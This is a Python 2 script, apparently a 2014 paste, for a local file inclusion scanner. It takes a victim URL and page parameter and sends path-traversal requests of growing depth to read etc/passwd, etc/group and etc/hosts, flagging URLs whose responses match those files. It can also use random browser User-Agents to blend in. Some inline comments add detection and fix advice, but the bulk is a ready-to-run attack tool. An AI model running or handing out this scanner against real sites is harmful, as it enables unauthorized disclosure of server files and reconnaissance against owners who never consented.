Googleinurl

[SCRIPT] An0th3r LFI sC4Nn3r v1.0

Dec 11th, 2014
  1. #!/usr/bin/env  python26
  2.  
  3. import optparse
  4. import sys
  5. import urllib2, socket
  6. import random
  7. import re
  8.  
# Start-up banner: ASCII-art title plus the author's contact details.
# It is printed with the usage text and again before a scan starts; it has
# no influence on the requests that are sent.
banner = """
                 $$\      $$$$$$$$\ $$$$$$\\
                 $$ |      $$  _____|\_$$  _|
        $$$$$$\ $$ |      $$ |        $$ |
        \____$$\ $$ |      $$$$$\     $$ |
        $$$$$$$ |$$ |      $$  __|     $$ |
       $$  __$$ |$$ |      $$ |        $$ |
       \$$$$$$$ |$$$$$$$$\ $$ |      $$$$$$\\
        \_______|\________|\__|      \______|
 
 
 
        $$$$$$\\
       $$  __$$\\
       $$ /  \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\  $$$$$$\  $$$$$$\\
       \$$$$$$\ $$  _____|\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\\
        \____$$\ $$ /      $$$$$$$ |$$ |  $$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|
       $$\  $$ |$$ |     $$  __$$ |$$ |  $$ |$$ |  $$ |$$   ____|$$ |
       \$$$$$$  |\$$$$$$$\\$$$$$$$ |$$ |  $$ |$$ |  $$ |\$$$$$$$\ $$ |
        \______/  \_______|\_______|\__|  \__|\__|  \__| \_______|\__|
 
                                                                An0th3r LFI sC4Nn3r v1.0
 
                               Written by:
 
                             Claudio Viviani
 
                          http://www.homelab.it
 
                             info@homelab.it
                          homelabit@protonmail.ch
 
                     https://www.facebook.com/homelabit
                     https://twitter.com/homelabit
                     https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""


# Command-line interface.  -u/--url and -t/--target are mandatory; the port,
# the socket timeout and the User-Agent switch are optional.
commandList = optparse.OptionParser('usage: %prog -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]\n')

# Each entry is (option flags, add_option keyword arguments); the options are
# registered in this order, which is also the order shown by print_help().
for flags, settings in (
    (('-u', '--url'),
     dict(action="store", dest="url",
          help="Insert URL: http[s]://www.victim.com")),
    (('-t', '--target'),
     dict(action="store", dest="target",
          help="Insert page: The name of the page to be scanned (Ex. index.php?page=)")),
    # A port of 0 means "not given"; the scheme decides the real default later.
    (('-p', '--port'),
     dict(action="store", dest="port", default=0, type="int",
          help="[Insert Port Number] - Default 80 or 443")),
    (('--timeout',),
     dict(action="store", dest="timeout", default=10, type="int",
          help="[Timeout Value] - Default 10")),
    (('-r', '--random-agent'),
     dict(action="store_true", dest="randomagent", default=False,
          help="[Set random UserAgent]")),
):
    commandList.add_option(*flags, **settings)


options, remainder = commandList.parse_args()


# Usage: without both a URL and a target page there is nothing to request, so
# show the banner and the option summary and leave with exit status 1.
if not (options.url and options.target):
    print(banner)
    print('')
    commandList.print_help()
    sys.exit(1)
#
# User-Agent list: the most common browser User-Agent strings as of 18/08/2014.
# Source: http://techblog.willshouse.com/2012/01/03/most-common-user-agents/
def randomAgentGen():
    """Build the HTTP header dict that is attached to every request.

    Reads the module-level RANDOMAGENT flag (set from -r / --random-agent).
    When the flag is true, one entry of the hard-coded browser list below is
    picked at random; otherwise the value is "Python-urllib/<major>.<minor>"
    for the running interpreter.

    Returns:
        A dict with the single key 'User-Agent'.

    Defender note: the script calls this once and reuses the result, so a
    whole run carries one User-Agent.  Because the header is freely chosen by
    the client, detection should key on the request path (the growing run of
    "../" in front of etc/passwd, etc/group or etc/hosts), not on this value.
    """
    browser_agents = [
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        # NOTE(review): the next entry has no ')' after "10_9_4"; it is kept
        # verbatim.  A value in that shape is unlikely to come from a real
        # browser, which makes it a usable log fingerprint for this script.
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
        'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
        'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
        'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
        'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
        'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
        'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
        'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
        'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
    ]

    if RANDOMAGENT:
        agent = random.choice(browser_agents)
    else:
        # Same value urllib2 would announce by default.
        agent = "Python-urllib/%s.%s" % sys.version_info[:2]

    return {'User-Agent': agent}
  186.  
# Files asked for through the traversal, each paired with the regexp that a
# line of the response has to match before the file counts as disclosed.
CHECK = {}
CHECK['etc/passwd'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:/[^:]*:/[^:]*)$'
CHECK['etc/group'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*)$'
CHECK['etc/hosts'] = '^(((([1]?\d)?\d|2[0-4]\d|25[0-5])\.){3}(([1]?\d)?\d|2[0-4]\d|25[0-5]))|([\da-fA-F]{1,4}(\:[\da-fA-F]{1,4}){7})|(([\da-fA-F]{1,4}:){0,5}::([\da-fA-F]{1,4}:){0,5}[\da-fA-F]{1,4})'

# Run-time settings copied from the parsed command line.
RANDOMAGENT = options.randomagent
TIMEOUT = options.timeout
URL = options.url
PORT = options.port
TARGET = options.target

# Split the scheme off the -u value and remember the port to use when -p was
# not given (PORT == 0): 443 for https://, 80 otherwise.  A value without a
# scheme is treated as plain http.
if URL.startswith("https://"):
    PROTO, URL, default_port = "https://", URL[8:], 443
elif URL.startswith("http://"):
    PROTO, URL, default_port = "http://", URL[7:], 80
else:
    PROTO, default_port = "http://", 80

# When what is left ends in "/", replace() removes every "/" in it, not only
# the trailing one.
if URL.endswith("/"):
    URL = URL.replace("/", "")
if PORT == 0:
    PORT = default_port

# Resolve the host name once, only to stop early on a bad name; the address
# is discarded and the requests below still use the name.
try:
    socket.gethostbyname(URL)
except socket.gaierror:
    print('Hostname could not be resolved. Exiting')
    sys.exit()

headers = randomAgentGen()

print(banner)
print('')
print('[*] URL:\t'+PROTO+URL)
print('[*] TARGET:\t'+TARGET)
print('[*] PORT:\t'+str(PORT))
print('')

found = 0

# Everything in front of the "../" run is the same for every request.
request_prefix = PROTO+URL+':'+str(PORT)+'/'+TARGET

# One GET per (file, depth) pair: <target> followed by 1..10 "../" segments
# and the file name, i.e. at most 3 x 10 = 30 requests per run.
#
# Defender note: in an access log this is a short burst of requests to one
# page whose parameter grows by one "../" per request, which a WAF or log rule
# can match whatever the User-Agent says.  On the application side the fix is
# to resolve the requested path and refuse anything outside the intended
# directory, or to map the parameter through an allow-list of known pages.
for wanted_file, pattern_text in CHECK.items():
    line_matcher = re.compile(pattern_text, re.IGNORECASE)

    for depth in range(1, 11):
        probe = request_prefix + "../" * depth + wanted_file

        try:
            req = urllib2.Request(probe, None, headers)
            connection = urllib2.urlopen(req, None, TIMEOUT)
            body_lines = connection.readlines()
            status = connection.getcode()

        # HTTP error - 4xx, 5xx: listed like any other miss
        except urllib2.HTTPError:
            print('[+] '+probe)

        # Connection error - Connection refused, No route to host
        except urllib2.URLError:
            print('Can\'t connect to host: '+PROTO+URL+' on port '+str(PORT))
            sys.exit()

        else:
            # Count the response lines that look like the wanted file; the
            # regexp is only consulted when the status is 200.
            matching_lines = sum(
                1 for body_line in body_lines
                if status == 200 and line_matcher.match(body_line)
            )

            # A single matching line is not enough: two or more are required
            # before the URL is flagged.
            if matching_lines > 1:
                print('[+] '+probe+'\t <--- FOUND')
                found = found + 1
            else:
                print('[+] '+probe)

if not found:
    print('')
    print('[+] Nothing found')